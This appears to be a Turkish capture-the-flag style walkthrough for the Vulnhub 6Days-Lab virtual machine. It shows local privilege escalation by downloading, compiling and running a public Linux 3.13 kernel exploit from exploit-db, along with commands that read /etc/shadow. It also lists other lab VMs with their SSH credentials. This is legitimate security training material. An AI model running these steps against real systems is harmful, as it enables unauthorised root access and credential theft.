Yazıda kullanılan 6Days-Lab sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/6days-lab-11,156/
Bu makineye aşağıdaki bilgiler ile erişim sağlanabilir.
Kullanıcı Adı: andrea
Parola: SayNoToPentests
Linux işletim sistemine standart yetkilerle elde edilen erişimde standart bir kullanıcı (andrea) haklarına sahip olunduğu görülmektedir.
id
head -3 /etc/passwd
head -3 /etc/shadow
İşletim sisteminin sürüm bilgilerine bakıldığında Ubuntu 12.04.5 LTS kullanıldığı ve Linux çekirdek sürümü 3.13.0 olduğu görülmektedir.
uname -a
cat /etc/*release*
Linux Kernel 3.13.0’te kritik bir zafiyet bulunmaktadır. Bu zafiyeti istismar edecek kod exploit-db‘den indirilerek hedef sisteme aktarılacak ve çalıştırılacaktır.
https://www.exploit-db.com/exploits/37292/
Benzer olarak istismar kodu Kernel-Exploits sitesinden de temin edilebilirdi.
https://www.kernel-exploits.com/
Veya, internetin olmadığı durumda ise Kali içerisindeki istismar kodu da kullanılabilirdi.
searchsploit ubuntu 12.04
ls -la /usr/share/exploitdb/platforms/linux/local/37292.c
Hedef sisteme bu dosya indirilir ve bu dosyanın C dosya tipinde olduğu görülür.
ls -la
wget https://www.exploit-db.com/download/37292 –no-check-certificate
ls -la
file 37292
İstismar kodu derlenir.
mv 37292 IstismarKaynakKodu.c
gcc IstismarKaynakKodu.c -o HakYukseltme
ls -la
Sonrasında da zafiyetli sistemde çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.
./HakYukseltme
id
whoami
head -3 /etc/shadow
Belirtilen zafiyetin bulunduğu diğer sanal ortamlardan bazıları aşağıdaki gibidir:
- Droopy v0.2: https://www.vulnhub.com/entry/droopy-v02,143/
- MSF Modülü: exploit/multi/http/drupal_drupageddon
- VulnOS 2: https://www.vulnhub.com/entry/vulnos-2,147/
- SSH (22) Kimlik Bilgileri: webmin / webmin1980
- Troll:1: https://www.vulnhub.com/entry/tr0ll-1,100/
- SSH (22) Kimlik Bilgileri: overflow / Pass.txt
- Typhoon: 1.02: https://www.vulnhub.com/entry/typhoon-102,267/
- SSH (22) Kimlik Bilgileri: typhoon / 789456123
Kaynak:
https://lamehackersguide.blogspot.com.tr/2016/07/how-i-rooted-6days-lab-11.html